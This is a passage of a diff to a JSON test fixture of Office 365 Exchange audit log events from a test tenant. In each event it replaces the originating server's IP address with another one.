Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6164,7 +6164,7 @@ "Operation": "Add-MailboxPermission", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -6194,7 +6194,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6206,7 +6206,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6280,7 +6280,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6292,7 +6292,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6366,7 +6366,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6378,7 +6378,7 @@ "Operation": "Enable-AddressListPaging", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DoNotUpdateRecipients", @@ -6404,7 +6404,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6416,7 +6416,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6490,7 +6490,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6502,7 +6502,7 @@ "Operation": "Install-ResourceConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -6524,7 +6524,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6536,7 +6536,7 @@ "Operation": "Set-RecipientEnforcementProvisioningPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -6566,7 +6566,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ 